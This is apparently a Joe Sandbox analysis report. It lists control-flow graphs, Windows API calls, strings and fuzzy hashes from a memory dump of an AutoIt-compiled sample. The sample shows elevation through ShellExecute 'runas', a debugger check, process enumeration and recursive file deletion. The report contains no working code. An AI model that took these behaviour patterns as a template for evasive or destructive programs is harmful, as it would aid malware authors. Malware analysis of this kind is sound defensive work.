99324->99325 99326 eaf9ae Mailbox 99325->99326 99326->99303 99326->99318 99328 ea39af 99327->99328 99329 ea3a15 99327->99329 99328->99329 99330 ea39b4 99328->99330 99331 ea394d 3 API calls 99329->99331 99332 ea3a09 99330->99332 99333 ea39be 99330->99333 99345 ea39fd Mailbox 99331->99345 99390 ea3a35 62 API calls Mailbox 99332->99390 99335 ea39de 99333->99335 99337 ea39c8 99333->99337 99336 e540cd 59 API calls 99335->99336 99338 ea39e6 99336->99338 99376 
e540cd 99337->99376 99389 ea38e0 61 API calls Mailbox 99338->99389 99342 ea39dc 99373 ea397e 99342->99373 99345->99326 99347 ea8cd9 99346->99347 99349 ea8cde 99346->99349 99393 ea7d6e 61 API calls 2 library calls 99347->99393 99349->99304 99394 ea384c 99350->99394 99352 ea3959 WriteFile 99352->99326 99353->99296 99355 e542cf CloseHandle 99354->99355 99356 e53e53 99355->99356 99403 e542f9 99356->99403 99358 e53e72 99362 e53e95 99358->99362 99411 e53c61 62 API calls Mailbox 99358->99411 99360 e53e84 99412 e5389f 99360->99412 99362->99300 99362->99308 99364 ea394d 3 API calls 99364->99362 99365->99303 99366->99300 99368 e60fe6 Mailbox 59 API calls 99367->99368 99369 e51652 99368->99369 99370 e60fe6 Mailbox 59 API calls 99369->99370 99371 e51660 99370->99371 99371->99320 99372->99303 99374 ea394d 3 API calls 99373->99374 99375 ea3990 99374->99375 99375->99345 99377 e60fe6 Mailbox 59 API calls 99376->99377 99378 e540e0 99377->99378 99379 e51c7e 59 API calls 99378->99379 99380 e540ed 99379->99380 99381 e5402a WideCharToMultiByte 99380->99381 99382 e54085 99381->99382 99383 e5404e 99381->99383 99392 e53f20 59 API calls Mailbox 99382->99392 99385 e60fe6 Mailbox 59 API calls 99383->99385 99386 e54055 WideCharToMultiByte 99385->99386 99391 e53f79 59 API calls 2 library calls 99386->99391 99388 e54077 99388->99342 99389->99342 99390->99345 99391->99388 99392->99388 99393->99349 99395 ea385e 99394->99395 99396 ea3853 99394->99396 99395->99352 99401 e542ae SetFilePointerEx 99396->99401 99398 ea38b8 SetFilePointerEx 99402 e542ae SetFilePointerEx 99398->99402 99400 ea38d7 99400->99352 99401->99398 99402->99400 99404 e906fc 99403->99404 99405 e54312 CreateFileW 99403->99405 99406 e54334 99404->99406 99407 e90702 CreateFileW 99404->99407 99405->99406 99406->99358 99407->99406 99408 e90728 99407->99408 99416 e5410a 99408->99416 99411->99360 99413 e538b5 99412->99413 99414 e538a8 99412->99414 99413->99362 99413->99364 99415 e5410a 2 API calls 99414->99415 99415->99413 99423 e54124 
99416->99423 99417 e906cc 99425 e542ae SetFilePointerEx 99417->99425 99418 e541ab SetFilePointerEx 99424 e542ae SetFilePointerEx 99418->99424 99421 e906e6 99422 e5417f 99422->99406 99423->99417 99423->99418 99423->99422 99424->99422 99425->99421 99427 e51207 59 API calls 99426->99427 99428 ea4024 99427->99428 99429 e51207 59 API calls 99428->99429 99430 ea402d 99429->99430 99431 e51207 59 API calls 99430->99431 99432 ea4036 99431->99432 99433 e60284 60 API calls 99432->99433 99434 ea4041 99433->99434 99435 ea4fec GetFileAttributesW 99434->99435 99436 ea404a 99435->99436 99437 ea405c 99436->99437 99438 e51900 59 API calls 99436->99438 99439 e60119 59 API calls 99437->99439 99438->99437 99440 ea4070 FindFirstFileW 99439->99440 99441 ea40fc FindClose 99440->99441 99444 ea408f 99440->99444 99445 ea4107 Mailbox 99441->99445 99442 ea40d7 FindNextFileW 99442->99444 99443 e51c9c 59 API calls 99443->99444 99444->99441 99444->99442 99444->99443 99446 e517e0 59 API calls 99444->99446 99447 e51900 59 API calls 99444->99447 99445->98627 99446->99444 99448 ea40c8 DeleteFileW 99447->99448 99448->99442 99449 ea40f3 FindClose 99448->99449 99449->99445 99450->98643 99451->98653 99452->98650 99454 eba918 99453->99454 99455 eba970 99453->99455 99456 e60fe6 Mailbox 59 API calls 99454->99456 99455->98683 99459 eba93a 99456->99459 99457 e60fe6 Mailbox 59 API calls 99457->99459 99459->99455 99459->99457 99485 e9715b 59 API calls Mailbox 99459->99485 99461 ea78ac 99460->99461 99463 ea78e3 99460->99463 99462 e60fe6 Mailbox 59 API calls 99461->99462 99461->99463 99462->99463 99464 e96ebc 99463->99464 99465 e96f06 99464->99465 99469 e96f1c Mailbox 99464->99469 99466 e51a36 59 API calls 99465->99466 99466->99469 99467 e96f5a 99471 e4a820 430 API calls 99467->99471 99468 e96f47 99470 ebc355 430 API calls 99468->99470 99469->99467 99469->99468 99473 e96f53 99470->99473 99476 e96f91 99471->99476 99494 e96cf1 59 API calls Mailbox 99473->99494 99474 e97002 99474->98710 99475 e96fdc 99475->99473 

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E5526C
• IsDebuggerPresent.KERNEL32 ref: 00E5527E
• GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00E552E6
  • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
  • Part of subcall function 00E4BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E4BC07
• SetCurrentDirectoryW.KERNEL32(?), ref: 00E55366
• MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00E90B2E
• SetCurrentDirectoryW.KERNEL32(?), ref: 00E90B66
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00EF6D10), ref: 00E90BE9
• ShellExecuteW.SHELL32(00000000), ref: 00E90BF0
  • Part of subcall function 00E5514C: GetSysColorBrush.USER32(0000000F), ref: 00E55156
  • Part of subcall function 00E5514C: LoadCursorW.USER32(00000000,00007F00), ref: 00E55165
  • Part of subcall function 00E5514C: LoadIconW.USER32(00000063), ref: 00E5517C
  • Part of subcall function 00E5514C: LoadIconW.USER32(000000A4), ref: 00E5518E
  • Part of subcall function 00E5514C: LoadIconW.USER32(000000A2), ref: 00E551A0
  • Part of subcall function 00E5514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E551C6
  • Part of subcall function 00E5514C: RegisterClassExW.USER32(?), ref: 00E5521C
  • Part of subcall function 00E550DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E55109
  • Part of subcall function 00E550DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E5512A
  • Part of subcall function 00E550DB: ShowWindow.USER32(00000000), ref: 00E5513E
  • Part of subcall function 00E550DB: ShowWindow.USER32(00000000), ref: 00E55147
  • Part of subcall function 00E559D3: _memset.LIBCMT ref: 00E559F9
  • Part of subcall function 00E559D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E55A9E
Strings
• It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00E90B28
• runas, xrefs: 00E90BE4
• AutoIt, xrefs: 00E90B23
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
• String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
• API String ID: 529118366-2030392706
• Opcode ID: a4ba35abd6df0cf3fa685559b89758cf6a8a6964fab575f9dfe6d493be6bfe64
• Instruction ID: 4437a5843d78d587701fc2ff26d0fd1700018a49a175dc805096aca8d574ec13
• Opcode Fuzzy Hash: a4ba35abd6df0cf3fa685559b89758cf6a8a6964fab575f9dfe6d493be6bfe64
• Instruction Fuzzy Hash: FD511531D0934CAECF11BBB0EC16EFD7BB9AB05381F1424A9F955721A2DA70654CEB21

Control-flow Graph
APIs
  • Part of subcall function 00E60284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E52A58,?,00008000), ref: 00E602A4
  • Part of subcall function 00EA4FEC: GetFileAttributesW.KERNEL32(?,00EA3BFE), ref: 00EA4FED
• FindFirstFileW.KERNEL32(?,?), ref: 00EA3D96
• DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00EA3E3E
• MoveFileW.KERNEL32(?,?), ref: 00EA3E51
• DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00EA3E6E
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 00EA3E90
• FindClose.KERNEL32(00000000,?,?,?,?), ref: 00EA3EAC
Similarity
• API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 4002782344-1173974218
• Opcode ID: 21db72904d2b09e94d82cf72b77ac27fcd1606fc36c291c01f2e34cdd2ae08d5
• Instruction ID: d7dcc34a0e1b481584a47976128100faceef9ae70e087bb69d4f78012d7a0d52
• Opcode Fuzzy Hash: 21db72904d2b09e94d82cf72b77ac27fcd1606fc36c291c01f2e34cdd2ae08d5
• Instruction Fuzzy Hash: 4151B43180120D9ACF05EBB0D952AEDB7B9AF15305F6051A9F841B7092EF316F0DCB60

Control-flow Graph
APIs
• GetVersionExW.KERNEL32(?), ref: 00E55D40
  • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
• GetCurrentProcess.KERNEL32(?,00ED0A18,00000000,00000000,?), ref: 00E55E07
• IsWow64Process.KERNEL32(00000000), ref: 00E55E0E
• GetNativeSystemInfo.KERNEL32(00000000), ref: 00E55E54
• FreeLibrary.KERNEL32(00000000), ref: 00E55E5F
• GetSystemInfo.KERNEL32(00000000), ref: 00E55E90
• GetSystemInfo.KERNEL32(00000000), ref: 00E55E9C
Similarity
• API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
• String ID:
• API String ID: 1986165174-0
• Opcode ID: 7069bf43e10f010b5c25c4ed94aaada016075dc80d12901f7896c8803525037b
• Instruction ID: 476953823ed15269fdfe0e196c484645c668271ffb75ef901a91658e1349a1bb
• Opcode Fuzzy Hash: 7069bf43e10f010b5c25c4ed94aaada016075dc80d12901f7896c8803525037b
• Instruction Fuzzy Hash: 3C91E53254ABC0DECB31CB6494611AABFE5AF25301F881E9ED4C7A3A41D631B64CC759

Control-flow Graph
APIs
  • Part of subcall function 00E60284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E52A58,?,00008000), ref: 00E602A4
  • Part of subcall function 00EA4FEC: GetFileAttributesW.KERNEL32(?,00EA3BFE), ref: 00EA4FED
• FindFirstFileW.KERNEL32(?,?), ref: 00EA407C
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00EA40CC
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 00EA40DD
• FindClose.KERNEL32(00000000), ref: 00EA40F4
• FindClose.KERNEL32(00000000), ref: 00EA40FD
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
• Opcode ID: d84e56c12eb4b839eb0365127bb2014883eb2376ae7245bdfab52a39f989d5fd
• Instruction ID: 4a413c4035146e5fbb19c2b38bda7600b6e55c21c000c156eaf56e6994a13e63
• Opcode Fuzzy Hash: d84e56c12eb4b839eb0365127bb2014883eb2376ae7245bdfab52a39f989d5fd
• Instruction Fuzzy Hash: 6631C3710093449FC304EB60D895AAFB7E8BF96305F442E5DF8D1A21D2EB61AA0CD753
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00EA416D
• Process32FirstW.KERNEL32(00000000,?), ref: 00EA417B
• Process32NextW.KERNEL32(00000000,?), ref: 00EA419B
• CloseHandle.KERNEL32(00000000), ref: 00EA4245
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 420147892-0
• Opcode ID: d7cbfb94232591d498d38a50665045f097f571a8ed2e51f37bc65423f43d5b2b
• Instruction ID: de92300579284359e962cbfcf22ba8a700219704e3c85a64e07da2e79f52da16
• Opcode Fuzzy Hash: d7cbfb94232591d498d38a50665045f097f571a8ed2e51f37bc65423f43d5b2b
• Instruction Fuzzy Hash: 0131E4711083019FC300EF50E885BAFBBE8EFD9305F50192DF581A61E1EBB1A948CB52
APIs
  • Part of subcall function 00E53740: CharUpperBuffW.USER32(?,00F071DC,00000002,?,00000000,00F071DC,?,00E453A5,?,?,?,?), ref: 00E5375D
• _memmove.LIBCMT ref: 00E4B68A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharUpper_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2819905725-0
                                                                                                          • Opcode ID: 16963bd05c442b87530e82849734ef1f3f55e55f69e6c0de1111092f43723748
                                                                                                          • Instruction ID: 9ed68e0973e3f62fdb900656c5a586e1911cb2f93e8bac43c12295a7c1e0030c
                                                                                                          • Opcode Fuzzy Hash: 16963bd05c442b87530e82849734ef1f3f55e55f69e6c0de1111092f43723748
                                                                                                          • Instruction Fuzzy Hash: 4FA27A706083419FD720DF24D480B6AB7E1FF88708F14A95DE89AAB362D771ED45CB92
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNEL32(?,00E8FC86), ref: 00EA495A
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EA496B
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EA497B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 48322524-0
                                                                                                          • Opcode ID: 23c0e703c8a1129108f9f1de2630bf0553391214a7fa0654da80632ba0ce316f
                                                                                                          • Instruction ID: 349920bc3e95372ffc1c98e4df5a652bedfe121525e7a420e19bf6a0ffe381dd
                                                                                                          • Opcode Fuzzy Hash: 23c0e703c8a1129108f9f1de2630bf0553391214a7fa0654da80632ba0ce316f
                                                                                                          • Instruction Fuzzy Hash: 17E0D8724125069B53106B38FC0D4EB7B5CDF8B339F140706F435E10E0E7B0A9584695
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 67d0d9b6e3da3b9f965ad3d60e69d1ebf1bcd8ba3c9a07a5353ffecc66525aa8
                                                                                                          • Instruction ID: 16d2d36e2c848e8368db0dee4c40141b71f81c44fd9e9045f1acdd05a87d80dd
                                                                                                          • Opcode Fuzzy Hash: 67d0d9b6e3da3b9f965ad3d60e69d1ebf1bcd8ba3c9a07a5353ffecc66525aa8
                                                                                                          • Instruction Fuzzy Hash: 7622AE74A00215DFDB14DF58E484AAFB7F0FF49304F14916AE95ABB352D334A981CB91
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandleResumeThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 3265327148-0
                                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                          • Instruction ID: 07f5c63f6e8cb22011c2594f59151056c21dc814d681dbb9a98e1ad5cdaf6722
                                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                          • Instruction Fuzzy Hash: 49310B70A40129DFCB18DF48E48096AF7A5FF59384B649A95E409EB251E732EDC1CBC0
                                                                                                          APIs
                                                                                                          • timeGetTime.WINMM ref: 00E4BF57
                                                                                                            • Part of subcall function 00E452B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E452E6
                                                                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00E836B5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePeekSleepTimetime
                                                                                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                                                          • API String ID: 1792118007-922114024
                                                                                                          • Opcode ID: 7081a0c149c204aa9f76a21457c93b03207e6647c57c36c4f9e717230951dd12
                                                                                                          • Instruction ID: 226e8d05958351b612cd6bce9e8953e68937576f36b03786d42192dce3995c0e
                                                                                                          • Opcode Fuzzy Hash: 7081a0c149c204aa9f76a21457c93b03207e6647c57c36c4f9e717230951dd12
                                                                                                          • Instruction Fuzzy Hash: 32C2AE70608341DFC728EF24D884BAAB7E4FF84704F14695DE48EA72A1DB71E949CB52

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00E43444
                                                                                                          • RegisterClassExW.USER32(00000030), ref: 00E4346E
                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E4347F
                                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00E4349C
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E434AC
                                                                                                          • LoadIconW.USER32(000000A9), ref: 00E434C2
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E434D1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                          • API String ID: 2914291525-1005189915
                                                                                                          • Opcode ID: fa7fd76ec226f74b80b5d4faac012e68972f1515b76f552a14082447f137000a
                                                                                                          • Instruction ID: 99ca94eba552e111112f6f87367ee2dea3a103740d48dcb5ba5a5e17972857f4
                                                                                                          • Opcode Fuzzy Hash: fa7fd76ec226f74b80b5d4faac012e68972f1515b76f552a14082447f137000a
                                                                                                          • Instruction Fuzzy Hash: 3B315871D45309EFDB40AFA4EC89BCDBBF0FB09310F14419AE590A62A0E3B51586CF91

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00E43444
                                                                                                          • RegisterClassExW.USER32(00000030), ref: 00E4346E
                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E4347F
                                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00E4349C
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E434AC
                                                                                                          • LoadIconW.USER32(000000A9), ref: 00E434C2
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E434D1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                          • API String ID: 2914291525-1005189915
                                                                                                          • Opcode ID: f7740e33d5d68af5d9780886fc1dc7f58ef0dc7769ee7bcfabc69e6c2db5fc5d
                                                                                                          • Instruction ID: 0754161cd39f412098188260379fafc45b18b259d585b79d0cea6cf2890bc272
                                                                                                          • Opcode Fuzzy Hash: f7740e33d5d68af5d9780886fc1dc7f58ef0dc7769ee7bcfabc69e6c2db5fc5d
                                                                                                          • Instruction Fuzzy Hash: 3821D0B1D05308AFDB40AFA5ED89B9DBBF4FB08700F14815AF610AA2A0D7B16544DFA1

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 00E600CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00E53094), ref: 00E600ED
                                                                                                            • Part of subcall function 00E608C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E5309F), ref: 00E608E3
                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E530E2
                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E901BA
                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E901FB
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00E90239
                                                                                                          • _wcscat.LIBCMT ref: 00E90292
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                          • API String ID: 2673923337-2727554177
                                                                                                          • Opcode ID: ef00fbd32fb95a66a3125f7627a094a19848b7c42551876f9c9a6a434f07616d
• Instruction ID: e7adf94f567a3017d4f13d5d662049237bc09194a71f88a97ee0670312b3a61e
• Opcode Fuzzy Hash: ef00fbd32fb95a66a3125f7627a094a19848b7c42551876f9c9a6a434f07616d
• Instruction Fuzzy Hash: 7C718E715057059EC704EF25EC4596BBBE8FF84380F80292EF985A32B1EF70994ADB52

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00E55156
• LoadCursorW.USER32(00000000,00007F00), ref: 00E55165
• LoadIconW.USER32(00000063), ref: 00E5517C
• LoadIconW.USER32(000000A4), ref: 00E5518E
• LoadIconW.USER32(000000A2), ref: 00E551A0
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E551C6
• RegisterClassExW.USER32(?), ref: 00E5521C
  • Part of subcall function 00E43411: GetSysColorBrush.USER32(0000000F), ref: 00E43444
  • Part of subcall function 00E43411: RegisterClassExW.USER32(00000030), ref: 00E4346E
  • Part of subcall function 00E43411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E4347F
  • Part of subcall function 00E43411: InitCommonControlsEx.COMCTL32(?), ref: 00E4349C
  • Part of subcall function 00E43411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E434AC
  • Part of subcall function 00E43411: LoadIconW.USER32(000000A9), ref: 00E434C2
  • Part of subcall function 00E43411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E434D1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
